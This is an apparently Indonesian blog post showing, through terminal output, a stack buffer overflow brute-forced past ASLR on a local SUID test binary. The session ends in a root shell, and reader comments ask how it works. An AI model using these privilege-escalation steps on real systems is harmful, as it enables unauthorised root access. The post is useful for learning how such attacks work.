break a time, with break the c0de…

easy buffer overflow exploitation


This is buffer overflow scenario with ASLR (Address Space Layer Randomization) and using some my tools that’s made so easy…

gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@c0debreaker:~/bof$ ./ron aaa
The message was: aaa
Program completed normally!
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 44 byte(s)
[!] Application got segmentation fault by giving 44 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf ron 48
[*] Using return address 0xbfd24880
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$
Advertisements

8 responses

  1. Cyb3erFr3ed0M

    bang gun mau nanya nich dikit…aku ikutin tutor bang gun dr awal ampe akhir tapi gagal trus waktu endingnya…..ane pke ubuntu 10.04…lo leh tau kegunaan exploitasi buffer overlow itu buat apa sich bang bls da mail wa ya rendy_rock44@yahoo.co.id

    July 26, 2010 at 6:27 am

    • kegunaannya gaining user privileges, kegagalan mungkin pada return address bro

      July 26, 2010 at 7:24 am

  2. Cyb3erFred0M

    “gaining user privileges” gak tau artinya bro gun heheheheehe…….maaf masih dudul bgt…..lo boleh tau cara cara exploitasi target itu giamana baro gun,,,,,,,,,,,,,,ajarin dikit bro gun….1 teknik exploitasi aku 2bulan aku belajar nyari ini maksudnya apa aku praktekkan juga gagal…….oke bro ajari dikit

    July 31, 2010 at 1:22 pm

    • gaining user privileges adalah mengambil hak akses user pada system agar system mengenali kita sama dengan si pemilik file binary bersuid tersebut

      August 1, 2010 at 6:45 am

  3. Cyb3erFred0M

    oooo begitu ya bro………oke langsung uji coba lagi…………….thanks bro gun

    August 1, 2010 at 10:10 pm

    • sama2 bro, jangan sungkan2 untuk tanya2…

      August 2, 2010 at 5:25 am

  4. Cyb3erFred0M

    bro gunnnn nanya lagi yang diatas itu “ron a” itu maksudnya apa ……

    August 9, 2010 at 10:52 pm

    • mencoba menginput data di aplikasi ron dengan huruf a bro

      August 10, 2010 at 5:08 am

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s